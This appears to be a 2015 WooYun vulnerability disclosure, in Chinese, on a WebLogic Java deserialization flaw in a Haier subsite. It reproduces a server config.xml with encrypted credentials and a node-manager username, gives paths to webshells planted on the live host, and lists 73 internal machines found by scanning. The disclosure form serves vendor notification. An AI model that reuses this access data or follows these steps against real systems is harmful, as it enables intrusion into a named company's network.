海尔旗下日日顺某分站存在JAVA反序列化漏洞#第二弹（可内网渗透73台机器/几乎所有系统都涉及到）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164061

漏洞标题：海尔旗下日日顺某分站存在JAVA反序列化漏洞#第二弹（可内网渗透73台机器/几乎所有系统都涉及到）

漏洞作者：路人甲

提交时间：2015-12-24 09:54

修复时间：2016-02-06 10:45

公开时间：2016-02-06 10:45

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-24：细节已通知厂商并且等待厂商处理中
2015-12-24：厂商已经确认，细节仅向厂商公开
2016-01-03：细节向核心白帽子及相关领域专家公开
2016-01-13：细节向普通白帽子公开
2016-01-23：细节向实习白帽子公开
2016-02-06：细节向公众公开

简要描述：

雷欧

详细说明：

http://27.223.70.113:7003/mainFrame.html
存在weblogic的反序列化漏洞
直接上工具吧
就不反弹了

查看下配置信息
cat config/config.xml

<?xml version='1.0' encoding='UTF-8'?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
  <name>zhwlpt_domain</name>
  <domain-version>10.3.6.0</domain-version>
  <security-configuration>
    <name>zhwlpt_domain</name>
    <realm>
      <sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider>
      <sec:authentication-provider xsi:type="wls:default-identity-asserterType">
        <sec:active-type>AuthenticatedUser</sec:active-type>
      </sec:authentication-provider>
      <sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper>
      <sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer>
      <sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator>
      <sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper>
      <sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider>
      <sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
      <sec:name>myrealm</sec:name>
      <sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
        <sec:name>SystemPasswordValidator</sec:name>
        <pas:min-password-length>8</pas:min-password-length>
        <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
      </sec:password-validator>
    </realm>
    <default-realm>myrealm</default-realm>
    <credential-encrypted>{AES}8Gslv9DTeozRmJFQt9bkl1S0OeHNpDnmil1nx82e3xVSeBS2EoVMB8ICAZE52UZV2klWydswwH8AcN0nR1x6/kUMy0/9rEFQ2Dt8zin7Hs12wpaWhzfJlofjlFC8GXDV</credential-encrypted>
    <node-manager-username>esSSMG8U26</node-manager-username>
    <node-manager-password-encrypted>{AES}zJAMkb+1wyAI44ZNflvAI0KHhNm//5AG4/Gk9VYM0Fk=</node-manager-password-encrypted>
  </security-configuration>
  <server>
    <name>zhwlpt_admin</name>
    <log>
      <number-of-files-limited>true</number-of-files-limited>
      <file-count>10</file-count>
    </log>
    <web-server>
      <web-server-log>
        <number-of-files-limited>true</number-of-files-limited>
        <file-count>10</file-count>
      </web-server-log>
    </web-server>
    <listen-address>10.135.108.88</listen-address>
  </server>
  <server>
    <name>zhwlpt_app1</name>
    <log>
      <number-of-files-limited>true</number-of-files-limited>
      <file-count>10</file-count>
    </log>
    <machine>zhwlptapp02</machine>
    <listen-port>7003</listen-port>
    <cluster>zhwlpt_cluster</cluster>
    <web-server>
      <web-server-log>
        <number-of-files-limited>true</number-of-files-limited>
        <file-count>10</file-count>
      </web-server-log>
    </web-server>
    <listen-address>10.135.108.88</listen-address>
    <server-start>
      <arguments>-server -Xms4096m -Xmx4096m -XX:PermSize=512m -XX:MaxPermSize=1024m -Dfile.encoding=UTF-8</arguments>
    </server-start>
    <jta-migratable-target>
      <user-preferred-server>zhwlpt_app1</user-preferred-server>
      <cluster>zhwlpt_cluster</cluster>
    </jta-migratable-target>
  </server>
  <server>
    <name>zhwlpt_app2</name>
    <log>
      <number-of-files-limited>true</number-of-files-limited>
      <file-count>10</file-count>
    </log>
    <machine>zhwlptapp03</machine>
    <listen-port>7003</listen-port>
    <cluster>zhwlpt_cluster</cluster>
    <web-server>
      <web-server-log>
        <number-of-files-limited>true</number-of-files-limited>
        <file-count>10</file-count>
      </web-server-log>
    </web-server>
    <listen-address>10.135.108.89</listen-address>
    <server-start>
      <arguments>-server -Xms4096m -Xmx4096m -XX:PermSize=512m -XX:MaxPermSize=1024m -Dfile.encoding=UTF-8</arguments>
    </server-start>
    <jta-migratable-target>
      <user-preferred-server>zhwlpt_app2</user-preferred-server>
      <cluster>zhwlpt_cluster</cluster>
    </jta-migratable-target>
  </server>
  <cluster>
    <name>zhwlpt_cluster</name>
    <cluster-messaging-mode>unicast</cluster-messaging-mode>
  </cluster>
  <production-mode-enabled>true</production-mode-enabled>
  <embedded-ldap>
    <name>zhwlpt_domain</name>
    <credential-encrypted>{AES}sTjZUzYFaEh9LETOqcVQwfjTmMS2A5HwoyGjFu0pydtq4OfKSdcFh4fqgs8sRlg7</credential-encrypted>
  </embedded-ldap>
  <configuration-version>10.3.6.0</configuration-version>
  <app-deployment>
    <name>opms</name>
    <target>zhwlpt_cluster,zhwlpt_admin</target>
    <module-type>war</module-type>
    <source-path>servers/zhwlpt_adminhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/opms.war</source-path>
    <security-dd-model>DDOnly</security-dd-model>
  </app-deployment>
  <app-deployment>
    <name>opms_edi</name>
    <target>zhwlpt_cluster,zhwlpt_admin</target>
    <module-type>war</module-type>
    <source-path>servers/zhwlpt_adminhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/opms_edi.war</source-path>
    <security-dd-model>DDOnly</security-dd-model>
  </app-deployment>
  <machine>
    <name>zhwlptapp02</name>
    <node-manager>
      <listen-address>10.135.108.88</listen-address>
    </node-manager>
  </machine>
  <machine>
    <name>zhwlptapp03</name>
    <node-manager>
      <listen-address>10.135.108.89</listen-address>
    </node-manager>
  </machine>
  <migratable-target>
    <name>zhwlpt_app1 (migratable)</name>
    <notes>This is a system generated default migratable target for a server. Do not delete manually.</notes>
    <user-preferred-server>zhwlpt_app1</user-preferred-server>
    <cluster>zhwlpt_cluster</cluster>
  </migratable-target>
  <migratable-target>
    <name>zhwlpt_app2 (migratable)</name>
    <notes>This is a system generated default migratable target for a server. Do not delete manually.</notes>
    <user-preferred-server>zhwlpt_app2</user-preferred-server>
    <cluster>zhwlpt_cluster</cluster>
  </migratable-target>
  <admin-server-name>zhwlpt_admin</admin-server-name>
  <jdbc-system-resource>
    <name>opmsJndi</name>
    <target>zhwlpt_cluster,zhwlpt_admin</target>
    <descriptor-file-name>jdbc/opmsJndi-8144-jdbc.xml</descriptor-file-name>
  </jdbc-system-resource>
</domain>

成功拿到shell
http://27.223.70.113:7003/uddiexplorer/1ss.jsp?o=index
探测下内网
http://27.223.70.113:7003/uddiexplorer/out.jsp
再次沦陷73台机器

http://10.135.108.16 >> 海尔翻译管理平台>>Apache-Coyote/1.1 >>Success
http://10.135.108.21 >> >>Apache/2.2.22 (Win32) mod_jk/1.2.30 >>Success
http://10.135.108.29 >> nginx>>nginx >>Success
http://10.135.108.37 >> >>Apache-Coyote/1.1 >>Success
http://10.135.108.36 >> >>Apache-Coyote/1.1 >>Success
http://10.135.108.38 >> >>Apache-Coyote/1.1 >>Success
http://10.135.108.93 >> 海尔微信公众号后台管理系统>>nginx/1.7.9 >>Success
http://10.135.108.64 >> Welcome to nginx!>>nginx/1.8.0 >>Success
http://10.135.108.65 >> Welcome to nginx!>>nginx/1.8.0 >>Success
http://10.135.108.87 >> haier>>Microsoft-IIS/6.0 >>Success
http://10.135.108.135 >> >>unknow >>Success
http://10.135.108.35 >> >>Jetty(8.1.15.v20140411) >>Success
http://10.135.108.40 >> 海尔B2B首页>>Apache-Coyote/1.1 >>Success
http://10.135.108.95 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.94 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.159 >> >>nginx/1.2.7 >>Success
http://10.135.108.160 >> HOPE>>nginx >>Success
http://10.135.108.117 >> >>Apache/2.2.21 (Unix) >>Success
http://10.135.108.157 >> 移动办公平台 >>MAM Server 1.0 >>Success
http://10.135.108.158 >> Welcome to nginx!>>nginx/1.5.13 >>Success
http://10.135.108.162 >> 登录>>Apache-Coyote/1.1 >>Success
http://10.135.108.18 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.19 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.178 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.179 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.12 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.107 >> Loading Portal...>>SAP J2EE Engine/7.00 >>Success
http://10.135.108.126 >> 云菜网云菜网>>null >>Success
http://10.135.108.148 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.50 >> 巨商汇_海尔店铺>>Apache-Coyote/1.1 >>Success
http://10.135.108.155 >> 海尔工业品商城>>Apache/2.4.6 (Unix) OpenSSL/1.0.1c mod_jk/1.2.37 >>Success
http://10.135.108.188 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.55 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.14 >> >>Apache/2.4.6 (Unix) OpenSSL/1.0.1g mod_jk/1.2.37 >>Success
http://10.135.108.49 >> 巨商汇_海尔店铺>>Apache-Coyote/1.1 >>Success
http://10.135.108.197 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.198 >> SCRM应用平台导航页>>nginx/1.4.4 >>Success
http://10.135.108.204 >> Welcome to nginx!>>nginx/1.6.1 >>Success
http://10.135.108.13 >> >>Apache/2.4.6 (Unix) OpenSSL/1.0.1g mod_jk/1.2.37 >>Success
http://10.135.108.199 >> ��ӭʹ���Ű�����Ӧ�ð�ȫ���>>Apache Coyote/1.0 >>Success
http://10.135.108.110 >> �����׼��Ϣ����ϵͳ>>Microsoft-IIS/6.0 >>Success
http://10.135.108.208 >> Login>>Lotus-Domino >>Success
http://10.135.108.200 >> 海尔互联网网站建设服务版块>>Apache-Coyote/1.1 >>Success
http://10.135.108.146 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.180 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.140 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.231 >> 海尔人才雷达：人才搜索>>Apache-Coyote/1.1 >>Success
http://10.135.108.232 >> 海客会-海尔·智慧社区生活服务平台>>null >>Success
http://10.135.108.235 >> WebSphere Application Server Version V8.5 Liberty Profile200 OK>>nginx/1.6.1 >>Success
http://10.135.108.201 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.132 >> 运行时错误>>Microsoft-IIS/7.0 >>Success
http://10.135.108.138 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.20 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.62 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.215 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.241 >> Loading Portal...>>SAP J2EE Engine/7.00 >>Success
http://10.135.108.249 >> Welcome to nginx!>>nginx >>Success
http://10.135.108.250 >> Welcome to nginx!>>nginx >>Success
http://10.135.108.252 >> Welcome to nginx!>>nginx >>Success
http://10.135.108.22 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.206 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.221 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.246 >> >>nginx/1.6.0 >>Success
http://10.135.108.17 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.211 >> 海尔企业客户采购|海尔商用解决方案-海尔B2B智慧集成解决方案平台>>Apache-Coyote/1.1 >>Success
http://10.135.108.209 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.118 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.81 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.181 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.10 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.212 >> 海尔企业客户采购|海尔商用解决方案-海尔B2B智慧集成解决方案平台>>Apache/2.4.7 (Unix) PHP/5.3.27 >>Success
http://10.135.108.61 >> M-lab创客实验室beta版>>Microsoft-IIS/7.5 >>Success
http://10.135.108.169 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.133 >> 海尔二维码管理平台>>Microsoft-IIS/7.0 >>Success
http://10.135.108.11 >> 首页 - 海尔文化交互平台>>Microsoft-IIS/7.0 >>Success
http://10.135.108.90 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.113 >> >>Microsoft-IIS/7.5 >>Success

漏洞证明：

修复方案：

升级

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-12-24 15:32

厂商回复：

感谢白帽子的测试与提醒，已安排人员进行处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164061

漏洞标题：海尔旗下日日顺某分站存在JAVA反序列化漏洞#第二弹（可内网渗透73台机器/几乎所有系统都涉及到）

相关厂商：海尔集团

漏洞作者：路人甲

提交时间：2015-12-24 09:54

修复时间：2016-02-06 10:45

公开时间：2016-02-06 10:45

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0164061

漏洞标题：海尔旗下日日顺某分站存在JAVA反序列化漏洞#第二弹（可内网渗透73台机器/几乎所有系统都涉及到）

相关厂商：海尔集团

漏洞作者： 路人甲

提交时间：2015-12-24 09:54

修复时间：2016-02-06 10:45

公开时间：2016-02-06 10:45

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0164061"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云